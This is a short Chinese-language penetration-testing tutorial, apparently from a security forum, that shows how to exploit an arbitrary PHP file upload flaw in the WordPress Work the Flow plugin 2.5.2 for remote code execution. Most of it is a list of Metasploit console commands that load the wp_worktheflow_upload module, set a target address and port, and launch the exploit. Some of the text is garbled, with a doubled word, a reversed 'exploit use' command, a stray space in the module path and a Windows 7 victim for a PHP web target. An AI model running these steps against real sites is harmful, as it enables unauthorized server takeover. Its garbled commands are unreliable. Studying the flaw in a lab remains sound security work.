渗透测试实战教程:如何利用利用WordPress Work the Flow插件的文件上传漏洞进行文件上传

此模块利用WordPress Work the Flow插件版本2.5.2中的任意PHP代码文件上传漏洞。该漏洞允许任意文件上传和远程代码执行
利用目标
使用Flow插件,版本2.5.2。
需求
攻击者:kali Linux
受害者PC:Windows 7
打开Kali终端类型  msfconsole
如何利用利用WordPress Work the Flow插件的文件上传漏洞进行文件上传
现在输入  exploit use / unix / webapp / wp_ worktheflow_upload
msf exploit (wp_worktheflow_upload)>set targeturi /wordpress
msf exploit (wp_worktheflow_upload)>set rhost 192.168.0.110 (远程主机的ip)
msf exploit (wp_worktheflow_upload)>set rport 80
msf exploit (wp_worktheflow_upload)>exploit  
如何利用利用WordPress Work the Flow插件的文件上传漏洞进行文件上传
转载请注明本文链接: http://www.mayidui.net/t2316.html
游客
登录后才可以回帖,登录 或者 注册